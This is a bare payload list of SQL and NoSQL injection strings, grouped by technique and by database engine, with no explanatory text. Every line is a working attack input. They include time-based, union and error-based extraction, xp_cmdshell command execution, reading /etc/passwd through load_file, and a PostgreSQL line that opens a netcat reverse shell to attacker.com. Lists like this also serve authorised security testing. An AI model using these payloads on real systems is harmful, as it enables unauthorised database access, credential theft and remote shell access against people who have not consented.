# Advanced SQL Injection Payloads
# Time-based payloads
'waitfor delay '00:00:05'--
'+(select*from(select(sleep(5)))a)+'
';WAITFOR DELAY '00:00:05';--
';SELECT pg_sleep(5);--

# Boolean-based payloads  
' and 1=1--
' and 1=2--
' and (select 1)=1--
' and (select count(*) from information_schema.tables)>0--

# Union-based payloads
' union select 1,2,3,4,5--
' union select null,null,null,null,null--
' union select version(),user(),database(),null,null--
' union select table_name,null,null,null,null from information_schema.tables--

# Error-based payloads
' and extractvalue(1,concat(0x7e,(select version()),0x7e))--
' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--
' or (select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)))--

# Advanced payloads
' and ascii(substring((select database()),1,1))>64--
' and length(database())>0--
' and exists(select * from information_schema.tables)--
';exec master..xp_cmdshell 'whoami'--

# NoSQL injection
'||'1'=='1
'||this.password.match(/.*/)//
{"$where": "this.username == 'admin'"}
';return '1'=='1'//

# PostgreSQL specific
';copy (select '') to program 'nc attacker.com 4444 -e /bin/sh'--
';CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE C STRICT;--

# MySQL specific
' and load_file('/etc/passwd')--
' into outfile '/tmp/test.txt'--
' and benchmark(5000000,md5(1))--

# MSSQL specific
';exec xp_cmdshell('whoami')--
';select @@version--
' having 1=1--

# Oracle specific
' and (select banner from v$version where rownum=1)='Oracle'--
' and 1=utl_inaddr.get_host_address('evil.com')--
